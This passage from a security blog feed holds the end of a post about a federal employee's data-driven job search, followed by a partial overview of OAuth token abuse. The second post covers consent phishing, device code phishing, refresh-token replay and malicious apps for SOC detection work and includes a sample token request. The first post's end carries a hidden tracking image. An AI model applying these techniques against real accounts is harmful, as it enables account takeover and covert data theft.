20<sup>th</sup> (Inauguration Day, lol). This was purposeful. Following the election, not only did this feel like the moral and ethical decision to make, but I also had the self-serving concern that the longer I stayed, I feared that the more toxic my background might appear to potential employers. I felt it necessary to demonstrate on my resume that I left so I would not implicitly appear complacent or supporting of whatever was to come. This ended up being pretty prescient (though it wouldn’t have taken a clairvoyant to predict it). <a href="https://www.cnn.com/2025/05/16/politics/supreme-court-alien-enemies-act">Illegal usage of the Alien Enemies Act</a> without due process, <a href="https://www.nbcnews.com/news/us-news/ice-deport-us-citizen-kids-stage-4-cancer-honduras-rcna224501">deportation</a> and <a href="https://www.newsweek.com/trump-voter-bachir-atallah-detained-border-agents-2060893">illegal arrest</a> of US citizens, detention based on <a href="https://www.yahoo.com/news/loser-border-czar-tom-homan-155054304.html?guccounter=1&amp;guce_referrer=aHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnLw&amp;guce_referrer_sig=AQAAAEKa5Ty7SnHMPPXc29-LP_MUII5K3lgyM5IJ5OIBZGFcyM-VQHRTaeAllXTqiSp7-7s6heFCY9US0jCD2Q1xgfAqycRnqLRBW1bJLOxAC6WJg-RqYDbIOG-HMca--IndpvjeU_u1O2j96fpbaU-jNxSwrnupJP_5BABUzYSx2qjt">physical appearance</a>, literally resurrecting the remains of Japanese internment for usage as <a href="https://www.usatoday.com/story/news/nation/2025/08/23/texas-army-base-japanese-internment-ice-detention/85767850007/">modern concentration camps</a>. Anyway..</p> <p>On January 28<sup>th</sup> 2025, the questionably created DOGE sent its first “Fork in the Road” email, announcing the <a href="https://www.nytimes.com/2025/01/28/us/politics/trump-buyouts-federal-workers.html">Deferred Resignation Program (DRP).</a> I pursued it heavily, as at this point I was going to leave – deal or no deal. At first, I was told I would not be eligible as mission-critical, but that eventually changed. Maybe not enough people were taking it, maybe somebody upstairs pushed some paper for me. I was unceremoniously kicked out February 28<sup>th</sup>. By then I had already applied to 138 jobs.</p> <p><br /></p> <h2 id="the-data">The Data</h2> <p>I should start by illustrating the initial dataset. With 15 years of SOC experience, an MBA and master’s in cybersecurity, and a PhD in cyber defense, I was extremely picky. I focused only on roles that matched my background and career stage. That meant senior or principal-level positions that required technical chops, leadership experience, or some combination of both. I was also only interested in remote work, which narrowed the field even further. So while the number of applications looks high, each one was deliberate. I was targeting roles I could realistically see myself in, not just sending resumes into the void. I set hard limits on salary range and would withdraw immediately if the pay communicated to me was lower than said range. Anecdotally, I think this probably put me at a disadvantage. Remote roles had me competing against applicants in geographic areas with lower costs of living. I live in a pretty high one. I suspect this limited me further.</p> <p>I think it’s also worth noting that accepting the DRP, with its pay through the end of September, also enabled this approach. I’ll touch on this further later, but this is not something very many can afford to do. In fact, 6 or 7 stage interview pipelines are arguably impossible for many working in secure facilities – but I digress. Let’s get into the data.</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/0c5e58be-c27f-47f5-aa41-224719035dfe" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>The Big Sankey</em></td> </tr> </tbody> </table> <p><br /></p> <h2 id="the-numbers">The Numbers</h2> <p>The Sankey basically speaks for itself. It shows the full funnel, from submission to outcome.</p> <p>Here’s how the 339 applications broke down:</p> <ul> <li><strong>237 auto-rejected (~70%)</strong><br /> Most applications never reached a person. This reflects the reality of Applicant Tracking Systems (ATS) and automated screening filters. Even with a strong resume, the majority of submissions were stopped at the gate.</li> <li><strong>80 ghosted (~24%)</strong><br /> Nearly one in four applications ended without a response. No rejection, no feedback, just silence. This became so common that I started to expect it, but it doesn’t make it any less discouraging.</li> <li><strong>26 first-round interviews (~7.7%)</strong><br /> About one in every thirteen applications resulted in an initial conversation. From there, the funnel narrowed quickly: <ul> <li><strong>19 second-rounds</strong></li> <li><strong>7 third-rounds</strong></li> <li><strong>6 fourth-rounds</strong></li> <li><strong>5 fifth-rounds</strong></li> <li><strong>3 sixth-rounds</strong></li> </ul> </li> <li><strong>3 withdrawals</strong><br /> In a few cases I stepped back myself, but I should note this was explicitly after I had accepted the one job offer.</li> <li><strong>18 rejections</strong><br /> Explicit “no’s” after one or more rounds of interviews.</li> <li><strong>1 offer</strong><br /> After 186 days of searching, one application turned into a job.</li> </ul> <p>A few additional ways to look at the data:</p> <ul> <li><strong>Applications per month:</strong> ~56</li> <li><strong>Applications per week:</strong> ~13–14 (nearly a part-time job just applying)</li> <li><strong>Interview-to-offer conversion:</strong> 1 out of 26 → ~3.8%</li> <li><strong>Application-to-offer conversion:</strong> 1 out of 339 → ~0.3%</li> <li><strong>Time spent:</strong> Given an average of 1 hour per interview, this cost me 66 hours of interviewing time. I averaged about 14.67 minutes per application. Round that up to 15 minutes and the 339 applications took ~84.75 hours. Application is a bit more of a wriggly statistic, as once you create the account and apply once in a given portal, subsequent applications are much quicker.</li> </ul> <p>I also graphed my day-to-day application and rejection load, but this turned out to be less useful than I would have liked. I thought I might be able to track individual application time to rejection, but lack of unique ID and piles of rejections from the same companies mean I’d have to try to do that manually. I don’t care to try to do that manually.</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/0d31d5a3-12c0-4f7d-acd0-3e8dca9bdb7d" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Day by Day Applications vs Rejections, colored by org</em></td> </tr> </tbody> </table> <p><br /></p> <h2 id="analysis">Analysis</h2> <p>Looking back at the numbers, a few clear patterns stand out that say as much about the hiring process as they do about my own search.</p> <p><strong>ATS filters are ruthless.</strong><br /> Seventy percent of my applications were stopped at the first step by automated systems. Even with senior-level experience and advanced degrees, most resumes never made it to a human. With the notable caveat that remote roles explicitly put me in the mix against hundreds of candidates rather than perhaps a few dozen, this was still pretty wild to me. I don’t have an explanation for this – other than maybe my resume was poorly written/optimized.</p> <p><strong>Ghosting has become normal.</strong><br /> One in four applications simply disappeared into silence. This wasn’t just after applying, but in a select few instances, ghosting happened after multiple rounds of interviews. It’s disheartening, but it reflects a broader cultural shift in hiring. I’ve read rumors as I’m sure many others have that some of these job listings aren’t even real. I have no data one way or the other.</p> <p><strong>The interview funnel is brutally narrow.</strong><br /> Out of 339 applications, 26 turned into first-round interviews. That’s about 8%. From there, each stage cut the field in half or more until just one remained. This “survival of the fittest” funnel isn’t surprising, but seeing it laid out shows how much persistence it takes to get to the finish line.</p> <p>An important detail worth mentioning here is that no interview pipelines for me resulted in a simple stacked “pass one to get to the next” model. Generally speaking, if you made it past the first two interviews, you can expect 3-5 more after. This panel approach, essentially across the board, involves the recruiter screen, hiring manager, and then a panel of various others. This is a lot of time and effort.</p> <p><strong>This is stupid.</strong></p> <p>Here’s some more stats not covered in the Sankey –</p> <p>I apparently created 63 different Workday accounts… probably more! This was just a manual count of companies that had Workday login portals showing up in their email communications.</p> <p>I created 16 different ICIMS accounts.</p> <p>And - I applied to 18 different jobs through LinkedIn. Zero interviews via this mechanism.</p> <p><br /></p> <h2 id="thoughts">Thoughts</h2> <p><strong>1. Um.. This is pretty brutal?</strong></p> <p>I simply can’t see how someone with fulltime employment can manage this. The best candidates for these more senior positions tend to already be gainfully employed and generally pretty busy. I say that, yet – I can’t argue with ending up with a single offer. Clearly others with similar or better qualifications are finding the same amount of time I did. It is undeniable that the privilege of steady pay throughout this process enabled the selectivity, and subsequently the length and breadth – of said search.</p> <p><strong>2. The marathon 6 interview panel process is objectively crazy, but I would undeniably appreciate being on the other side of it.</strong></p> <p>These were obviously a grind, and predictably all over the map as far as competencies. I got fuzzy theoretical questions about fixing business process challenges. I was asked to craft a Splunk query off the top of my head. I got OSI Model questions. I got threat modeling questions. I was asked about Python libraries. I crafted a sample intel report from raw data. I was asked about approaches to briefing non-technical executive leadership. If you’re looking for advice, I frankly don’t have any.</p> <p>But that said, I can’t help but appreciate the value of gaining multiple perspectives from multiple experts on the team. I admittedly would like the approach as a hiring manager. I absolutely am not a fan of going through it over two dozen times.</p> <p><strong>3. I think it is hugely valuable for the hiring managers to reach out to the final round rejects and provide the feedback. I think it’s classy, personal and professional.</strong></p> <p>I remember the name and company of every hirer that extended me the courtesy of why I was not selected after getting through the pipeline. I think there’s something to be said for that. I’d be looking for wherever they are first in the future if I start this process up again.</p> <p><br /> <br /> Anyways, Happy Labor Day 2025</p> <p><img src="http://canarytokens.com/stuff/about/traffic/0ay7hk5g3gyl40eairta3e4gy/post.jsp" style="display: none;" /></p>
  116. No Malware Required: OAuth Token Abuse

    Sat, 02 Aug 2025 00:00:00 -0000

    Who needs an endpoint?
    <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/e4a24d08-8f14-4aab-9b13-5970331a6243" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Who needs an endpoint?</em></td> </tr> </tbody> </table> <p><br /></p> <p><a href="https://www.linkedin.com/posts/floroth_phishing-for-codes-russian-threat-actors-activity-7320705236879224832-q1ld/">This post</a> from Florian Roth has been living in my head rent-free for months because it’s true - also part &amp; parcel to every compromise I’ve personally dealt with over the last X number of years - so I thought I’d write it up and add it to the pile. This is intended to be a generic overview of what OAuth is, what it does, how it subsequently can be abused as a result. We’ll summarize the last few big use-cases and go over some detection strategies.</p> <p><br /></p> <h2 id="introduction">Introduction</h2> <p>Modern breaches don’t always start with malware. Increasingly, they begin and persist with nothing more than a token. <a href="https://www.varonis.com/blog/what-is-oauth">OAuth</a>, the protocol designed to make third-party access to cloud resources safe and flexible, has quietly become one of the most effective tools for threat actors. It enables everything from <a href="https://appomni.com/ao-labs/oauth-tokens-danger-behind-commvault-breach/">silent lateral movement</a> to durable, cloud-native persistence without dropping a single binary or tripping traditional EDR defenses.</p> <p>Over the past decade, enterprise security strategies have largely focused on detecting malware, lateral movement, and endpoint anomalies. <a href="https://unit42.paloaltonetworks.com/2025-cloud-security-alert-trends/">But modern breaches, especially in cloud-first organizations, increasingly bypass these defenses entirely</a>. There’s no payload to detonate, no command to trace back to a known C2, and often no EDR detection at all. Often and depending on the adversary’s objective, there’s little reason to compromise a device at all, when the targeted information resides entirely in the cloud. So instead, access comes through OAuth tokens: small, opaque strings that grant expansive, often long-lived access to cloud services like Microsoft 365, Google Workspace, Slack, Dropbox, and more.</p> <p>Attackers have realized that the <a href="https://arxiv.org/html/2504.17759v1">identity plane</a>, particularly the OAuth authentication layer, is the weakest link in modern enterprise infrastructure. With the right token and a registered app, they can move directly from phishing to <a href="https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/">persistence</a>, skipping many of the traditional intrusion steps that security teams are trained to detect. For SOC analysts, this represents a fundamental shift in the threat landscape that demands new detection approaches, monitoring strategies, and incident response procedures.</p> <p>This post explores how attackers use access tokens to gain entry, refresh tokens to persist, and cloud-native APIs to operate invisibly—all without ever setting off a traditional security alarm. We’ll examine the technical mechanics behind these attacks, analyze real-world campaigns that have leveraged these techniques, and provide actionable guidance for security teams looking to detect and defend against token-based intrusions in their own environments.</p> <p><br /></p> <h2 id="understanding-oauth-tokens-as-long-lived-access">Understanding OAuth Tokens as Long-Lived Access</h2> <p>At the heart of OAuth-based abuse is a subtle but powerful distinction: attackers aren’t necessarily stealing passwords… they’re simply <a href="https://cloud.google.com/architecture/bps-for-mitigating-gcloud-oauth-tokens">stealing access</a>. OAuth tokens, particularly refresh tokens, are designed to enable seamless, long-term user sessions without requiring users to log in again. That design choice, while user-friendly, creates an ideal mechanism for persistence that fundamentally challenges traditional security assumptions.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/32e1e6cf-43eb-446c-92ea-8b6575d94bd3" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>OAuth flow, courtesy of <a href="https://medium.com/codenx/oauth-2-0-4cddd6c7471f">codenx</a></em></td> </tr> </tbody> </table> <p><br /></p> <p>In a <a href="https://medium.com/codenx/oauth-2-0-4cddd6c7471f">typical OAuth flow</a>, once a user grants consent, they receive a short-lived access token, usually valid for about an hour. This token allows access to specific resources like email, calendar, or file storage, depending on the scopes granted during the initial authorization. Behind the scenes, however, a refresh token is also issued. Unlike access tokens, <a href="https://auth0.com/blog/refresh-tokens-what-are-they-and-when-to-use-them/">refresh tokens</a> are often valid for days, weeks, or even months. Their purpose is to let the client silently request new access tokens without user involvement, creating a seamless experience where applications can maintain long-term access to user data.</p> <p>This design creates the foothold that attackers exploit. If an attacker obtains a refresh token, for example, via a <a href="https://pushsecurity.com/help/what-is-consent-phishing">consent phishing attack</a> or through <a href="https://www.menlosecurity.com/blog/the-art-of-mfa-bypass-how-attackers-regularly-beat-two-factor-authentication">proxy-based MFA bypass</a>, they can generate new access tokens repeatedly… long after the initial intrusion. The user may change their password, the attacker may lose access to the initial session cookie, and MFA may be reconfigured, but unless the refresh token is explicitly revoked or expires, it remains valid and functional.</p> <p>Cloud identity providers like Microsoft Azure AD compound this persistence challenge. In many tenants, refresh tokens can survive password resets and remain usable unless conditional access policies enforce reauthentication or the admin manually revokes sessions. Worse, refresh tokens <a href="https://learn.microsoft.com/en-us/entra/identity/devices/concept-primary-refresh-token?tabs=windows-prt-issued%2Cwindows-prt-used%2Cwindows-prt-renewal%2Cwindows-prt-protection%2Cwindows-apptokens%2Cwindows-browsercookies%2Cwindows-mfa">may be issued per session or device</a>, allowing multiple concurrent footholds that must each be individually addressed during incident response.</p> <p>This token-based persistence model means that traditional credential hygiene is often insufficient. Defenders must shift focus from only watching for leaked passwords or suspicious login IPs to monitoring for anomalous token reuse, high-risk OAuth app grants, and silent access via long-lived refresh tokens. The challenge for SOC teams becomes identifying <a href="https://learn.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth">legitimate API usage from malicious token abuse</a> when both generate identical traffic patterns to cloud services.</p> <p><br /></p> <h2 id="core-technique-oauth-token-lifecycle-abuse">Core Technique: OAuth Token Lifecycle Abuse</h2> <p>At the heart of every OAuth-based attack is the <a href="https://learn.microsoft.com/en-us/entra/identity-platform/configurable-token-lifetimes">token lifecycle</a>: a workflow designed to simplify secure, delegated access to cloud resources. When misused, it becomes a powerful tool for intrusion, persistence, and exfiltration that operates entirely within the bounds of legitimate service APIs.</p> <p>OAuth typically issues two types of tokens that serve different but complementary roles in an attack chain. <a href="https://oauth.net/2/access-tokens/">Access tokens</a> are short-lived, usually valid for about an hour, and grant access to specific APIs or scopes. <a href="https://oauth.net/2/refresh-tokens/">Refresh tokens</a> are longer-lived, often persisting for days to months, and can mint new access tokens without user interaction. These tokens are issued after the user authenticates and authorizes a third-party or native application, creating what should be a controlled delegation of access rights.</p> <p>In <a href="https://konghq.com/blog/learning-center/what-is-oauth">legitimate use cases</a>, this system allows users to seamlessly interact with productivity tools, email clients, or mobile apps without repeated logins. However, in attacker workflows, the token itself becomes the breach. The distinction is crucial: rather than breaking into systems, attackers are being invited in through legitimate authorization flows, then exploiting the persistent nature of those authorizations to maintain long-term access.</p> <p>The first phase of token lifecycle abuse involves access <a href="https://curity.io/blog/protect-against-token-and-credential-theft-in-2024/">token theft for initial access</a>. Access tokens are typically treated as bearer tokens, meaning possession equals permission. If an attacker captures an access token, they can immediately act as the user, issuing API calls against Microsoft Graph endpoints like <code class="language-plaintext highlighter-rouge">/me/messages</code>, <code class="language-plaintext highlighter-rouge">/me/drive</code>, and <code class="language-plaintext highlighter-rouge">/me/calendar</code>, or Google APIs for Gmail, Drive, and Contacts. These tokens can be harvested through consent phishing attacks that trick users into granting access to malicious apps, malware or infostealers that extract tokens from disk or browser cache, or man-in-the-middle proxies that capture access tokens as users log in to legitimate services.</p> <p>The critical challenge for defenders is that these activities are often indistinguishable from legitimate usage unless specifically monitored at the identity and API level. Traditional network monitoring won’t catch this activity because it all flows over standard HTTPS connections to legitimate cloud services. Endpoint detection won’t trigger because there’s no malicious code execution. The attack lives <a href="https://datadome.co/guides/ddos/how-to-detect-and-mitigate-application-layer-attacks/">entirely in the identity and authorization layer</a>.</p> <p>The second phase involves refresh token abuse for persistence. If the attacker also captures the associated refresh token, they gain <a href="https://www.rfc-editor.org/rfc/rfc6749#section-6">long-term access that persists beyond typical remediation efforts</a>. Refresh tokens are designed to reissue access tokens silently, often without any user interaction or reauthentication. This makes them functionally equivalent to cloud-native implants—invisible, durable, and API-enabled backdoors into organizational resources.</p> <p>During this phase, attackers will repeatedly call the token endpoint to mint new access tokens at regular intervals. A typical refresh request looks like a <a href="https://learn.microsoft.com/en-us/advertising/guides/authentication-oauth-get-tokens?view=bingads-13">standard OAuth flow</a>: <code class="language-plaintext highlighter-rouge">POST https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token</code> with parameters including <code class="language-plaintext highlighter-rouge">grant_type=refresh_token</code>, the stolen refresh token, client ID, and requested scopes. To monitoring systems, this appears as normal application behavior, making detection extremely challenging without specific behavioral analytics.</p> <p>What makes this technique especially dangerous is that everything takes place over legitimate services. The login is real, the tokens are valid, and the API traffic is normal. There’s no malware, no beaconing, and no unusual network connections unless defenders are examining identity and API logs at a granular level. This represents a fundamental shift in how attackers establish persistence: rather than maintaining access through technical compromises, they’re leveraging legitimate business processes and identity systems.</p> <p><br /></p> <h2 id="sub-techniques-building-blocks-of-a-cloud-intrusion">Sub-Techniques: Building Blocks of a Cloud Intrusion</h2> <p>The effectiveness of OAuth token abuse stems from a variety of sub-techniques that attackers combine to create sophisticated, persistent access scenarios. Each technique exploits different aspects of the OAuth ecosystem, from user psychology to administrative misconfigurations, creating multiple pathways for initial access and persistence.</p> <p><a href="https://securitylabs.datadoghq.com/cloud-security-atlas/attacks/malicious-oauth-application-consent/">Consent phishing represents the most common initial access vector</a>, exploiting the user’s trust in familiar login interfaces. Attackers create malicious OAuth applications and trick users into granting consent through legitimate authorization flows. The technical implementation involves registering an application in Azure AD or Google Workspace, crafting phishing emails with legitimate OAuth authorization URLs, and presenting users with authentic Microsoft or Google consent screens. Users <a href="https://www.proofpoint.com/us/blog/email-and-cloud-threats/how-attackers-use-compromised-accounts-create-and-distribute-malicious">grant permissions</a> believing they’re authorizing a legitimate business application, while the attacker receives authorization codes that can be exchanged for long-lived tokens.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/fd6597d4-ac45-434c-919b-3122edb8ad39" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Tokens, please</em></td> </tr> </tbody> </table> <p><br /></p> <p>The sophistication of modern consent phishing campaigns has evolved significantly. Attackers carefully craft application names to <a href="https://www.logpoint.com/en/blog/emerging-threats/how-oauth-and-device-code-flows-get-abused/">mimic legitimate services</a>, such as “Office365_Management” or “SharePoint_Connector,” and initially request minimal permissions to avoid triggering user suspicion. Once initial consent is granted, they may use additional consent flows to escalate privileges, gradually building up access to sensitive resources like email, files, and administrative functions.</p> <p><a href="https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/">Device code flow abuse</a> exploits the authentication mechanism designed for devices without browsers, such as smart TVs or IoT devices. Attackers initiate the device code flow by making a POST request to the OAuth device code endpoint, <a href="https://cloudbrothers.info/en/protect-users-device-code-flow-abuse/">receiving a device code and user code in response</a>. They then social engineer victims to visit the legitimate device login portal and enter the user code, completing the authentication process. While the victim believes they’re helping to authenticate a legitimate device, the attacker polls the token endpoint and receives access and refresh tokens for the victim’s account.</p> <p>This technique is particularly insidious because it leverages Microsoft and Google’s own device authentication infrastructure. The victim sees legitimate Microsoft or Google branding throughout the process, and the authentication flow appears completely normal. For defenders, device code flows can be difficult to distinguish from legitimate device registrations without careful analysis of user patterns and device characteristics.</p> <p><a href="https://www.cybermaxx.com/resources/how-does-a-malicious-oauth-application-attack-work-oauth2-research/">Silent consent via admin-registered applications</a> exploits pre-approved applications or apps with AdminConsent set to true, eliminating the user prompt that might alert victims to suspicious activity. Advanced persistent threat actors often combine this technique with administrative account compromise, registering applications with broad permissions that can be used across the organization without individual user consent. This approach provides immediate, organization-wide access and is particularly effective in environments where administrative privileges are poorly controlled. This technique is parituclarly bad because it generally means <a href="https://blog.hypr.com/key-takeaways-from-the-entra-id-tenant-compromise">total tenant compromise</a>.</p> <p>Token theft via malware and infostealers represents a more traditional but still effective approach. Modern infostealers like <a href="https://www.splunk.com/en_us/blog/security/do-not-cross-the-redline-stealer-detections-and-analysis.html">RedLine</a>, Raccoon, and <a href="https://medium.com/@bendavidbenyamin/arkei-variants-from-vidar-to-mars-stealer-3e8c2a24ca24">Vidar</a> are increasingly sophisticated at extracting OAuth tokens from browser storage, memory, and disk locations where applications cache authentication credentials. These tools often target the <a href="https://pushsecurity.com/blog/what-the-rise-of-infostealers-says-about-identity-attacks/">token storage mechanisms</a> used by popular applications like Microsoft Teams, Outlook, and various productivity tools that maintain persistent sessions through refresh tokens.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/7368fa10-ad30-4d37-9090-334a3e20b7f3" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Multi-tenant abuse, courtesy <a href="https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/">Microsoft</a></em></td> </tr> </tbody> </table> <p><br /></p> <p><a href="https://www.tenable.com/indicators/ioe/entra/APPLICATION-ALLOWING-MULTI-TENANT-AUTHENTICATION">Multi-tenant application abuse</a> allows attackers to maximize their return on investment by registering a single malicious application that can be <a href="https://learn.microsoft.com/en-us/entra/identity-platform/single-and-multi-tenant-apps">used across multiple organizations</a>. Once registered as a multi-tenant app, the same application ID can be used to phish users across different Azure AD tenants, allowing attackers to scale their operations efficiently. This technique is particularly dangerous because it allows for <a href="https://www.wiz.io/blog/azure-active-directory-bing-misconfiguration">cross-organizational attacks</a> using the same infrastructure and application registration.</p> <p><a href="https://blog.sekoia.io/targeted-supply-chain-attack-against-chrome-browser-extensions/">Malicious browser extensions</a> provide another vector for token harvesting and injection. These extensions can <a href="https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5?gi=ae0a0322026e">harvest tokens and refresh tokens from legitimate applications</a>, inject additional OAuth scopes silently, or manipulate the consent process to grant broader permissions than users intended. Because browser extensions operate with elevated privileges within the browser context, they can access token storage mechanisms that would be protected from other types of malware.</p> <p>The persistence phase leverages <a href="https://auth0.com/docs/secure/tokens/refresh-tokens/refresh-token-rotation">refresh token replay</a> as the primary technique for maintaining long-term access. Attackers use captured refresh tokens to <a href="https://learn.microsoft.com/en-us/linkedin/shared/authentication/programmatic-refresh-tokens">mint new access tokens repeatedly</a> over time, often automating this process to maintain continuous access. Some sophisticated campaigns implement token management systems that track token lifetimes and automatically refresh tokens before expiration, creating highly resilient persistence mechanisms.</p> <p><a href="https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/">OAuth applications themselves become backdoors</a> in many campaigns. Rather than maintaining persistence through traditional implants or scheduled tasks, attackers leverage the registered application as their durable foothold. This approach is persistent until the application is specifically revoked from the tenant, and it provides a legitimate-appearing mechanism for continued access to organizational resources.</p> <p><a href="https://cloud.google.com/apigee/docs/api-platform/antipatterns/oauth-long-expiration">Token persistence via long TTL applications</a> exploits misconfigurations in refresh token lifetime policies. Some organizations configure applications with extremely long refresh token lifetimes, sometimes 90 days or more, creating extended windows of opportunity for attackers. Combined with applications that have broad permission scopes, these configurations can provide attackers with <a href="https://www.iflockconsulting.com/blog/oauth-phishing">months of persistent access</a> from a single successful compromise.</p> <p><br /></p> <h2 id="real-world-use-cases">Real-World Use Cases</h2> <p>Recent campaigns have demonstrated the real-world effectiveness of OAuth token abuse across various threat actor categories, from nation-state groups to commodity cybercriminals. These cases illustrate how the techniques discussed above translate into operational successes for attackers and detection challenges for defenders.</p> <p>The <a href="https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/">2025 Volexity investigation</a> revealed multiple Russian threat actors conducting highly targeted social engineering operations to gain Microsoft 365 access through OAuth workflows. Since early March 2025, these actors, tracked as <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/uta0352">UTA0352</a> and <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/uta0355">UTA0355</a>, have been aggressively targeting individuals and organizations with ties to Ukraine and human rights advocacy. The campaigns demonstrate sophisticated social engineering that begins with impersonated European political officials contacting targets via Signal and WhatsApp, inviting them to join video conferences about Ukraine-related matters.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/841fe549-3011-4d89-9821-07f3d4085652" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>With a social engineering twist, courtesy <a href="https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/">Volexity</a></em></td> </tr> </tbody> </table> <p><br /></p> <p>The technical execution reveals careful operational planning: attackers create malicious OAuth applications and trick users into granting consent through legitimate authorization flows, with one campaign using Visual Studio Code’s <a href="https://code.visualstudio.com/docs/debugtest/debugging-configuration">redirect functionality</a> to make code extraction appear more legitimate. Rather than requesting broad permissions immediately, these campaigns often started with minimal scopes like basic profile access, then escalated over time. What made these attacks particularly dangerous was their persistence: <a href="https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/">refresh tokens allowed continued access</a> even after password resets and security measure implementations.</p> <p>In one variation documented by Volexity, attackers used a <a href="https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/">compromised Ukrainian Government email account</a> to add legitimacy to their outreach, followed by Signal and WhatsApp messages referencing the initial email. This multi-stage approach combined the authority of official communication with the intimacy of personal messaging platforms, making victims more likely to trust the subsequent OAuth authorization requests.</p> <p><a href="https://www.proofpoint.com/us/blog/threat-insight/microsoft-oauth-app-impersonation-campaign-leads-mfa-phishing">Proofpoint’s analysis of Microsoft OAuth application impersonation campaigns throughout 2025</a> revealed threat actors creating fake applications that impersonate trusted enterprise services like RingCentral, SharePoint, Adobe, and DocuSign. These campaigns leveraged multifactor authentication bypass through attacker-in-the-middle phishing kits, <a href="https://www.proofpoint.com/us/blog/email-and-cloud-threats/tycoon-2fa-phishing-kit-mfa-bypass">predominantly using the Tycoon platform</a>. The sophistication became apparent in how attackers customized applications to specific industries—for example, impersonating ILSMart inventory services when targeting aerospace and defense companies.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/d13dcbcf-db82-4ef7-852d-53014364d0b8" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>More malicious apps, courtesy <a href="https://www.proofpoint.com/us/blog/threat-insight/microsoft-oauth-app-impersonation-campaign-leads-mfa-phishing">Proofpoint</a></em></td> </tr> </tbody> </table> <p><br /></p> <p>The Proofpoint research documented over 50 impersonated applications across multiple campaigns, with threat actors demonstrating remarkable efficiency in scaling their operations. Whether victims clicked “Accept” or “Cancel” on OAuth consent prompts, they were redirected to counterfeit Microsoft authentication pages designed to harvest credentials and session tokens. This approach effectively bypassed traditional MFA protections because the attacker captured both the <a href="https://www.proofpoint.com/us/blog/threat-insight/http-client-tools-exploitation-account-takeover-attacks">primary credentials and the second factor authentication</a> tokens in real-time.</p> <p>The <a href="https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/authentic-antics/ncsc-mar-authentic_antics.pdf">UK’s National Cyber Security Centre analysis of “Authentic Antics” malware</a> revealed a different approach to OAuth abuse, where malware running within the Outlook process displayed malicious login prompts to steal credentials and OAuth tokens. This sophisticated campaign demonstrated how <a href="https://www.ncsc.gov.uk/news/uk-call-out-russian-military-intelligence-use-espionage-tool">OAuth abuse could be integrated with traditional malware deployment</a>, using extensive defense evasion techniques including environmental keying and ntdll.dll unhooking to avoid detection.</p> <p>What distinguished Authentic Antics was its patient operational approach: the malware only executed once every six days to avoid detection, <a href="https://cyble.com/blog/uk-exposes-authentic-antics-malware-campaign/">communicated exclusively with legitimate Microsoft services</a>, and exfiltrated data by sending emails from victim accounts to attacker-controlled addresses without appearing in sent folders. The malware cleverly exploited user familiarity with Microsoft authentication prompts, generating them from within the legitimate Outlook process to enhance credibility.</p> <p>Recent commodity cybercriminal campaigns have demonstrated how OAuth abuse techniques have become accessible to lower-skilled threat actors. Business email compromise operations increasingly register applications with <a href="https://www.bleepingcomputer.com/news/security/malicious-adobe-docusign-oauth-apps-target-microsoft-365-accounts/">names like “Payroll Docs” or “DocuSign Manager”</a> to request <code class="language-plaintext highlighter-rouge">Mail.Send</code> and <code class="language-plaintext highlighter-rouge">Mail.ReadWrite</code> permissions, enabling internal phishing and invoice fraud without triggering authentication alerts. Some dark web actors now offer <a href="https://www.resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web">“Malicious App-as-a-Service” bundles</a>, renting out pre-approved applications and stolen refresh tokens to enable turnkey cloud compromise campaigns.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/36087266-8e94-4ed8-be39-9f7df8dc6ab3" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Behind the scenes, Cpanel for exilproxy</em></td> </tr> </tbody> </table> <p><br /></p> <p><a href="https://hackread.com/onedrive-file-picker-apps-full-access-user-drives/">OneDrive File Picker abuse</a> represents an emerging trend where attackers exploit legitimate file access flows to request full drive permissions under the guise of document previews. These campaigns take advantage of vague application descriptions and limited default warnings in Microsoft’s OAuth consent screens, making it difficult for users to recognize they’re authorizing malicious access.</p> <p><a href="https://www.semperis.com/blog/noauth-abuse-alert-full-account-takeover/">Cross-tenant application abuse</a> allows attackers to maximize their return on investment by registering single malicious applications that work 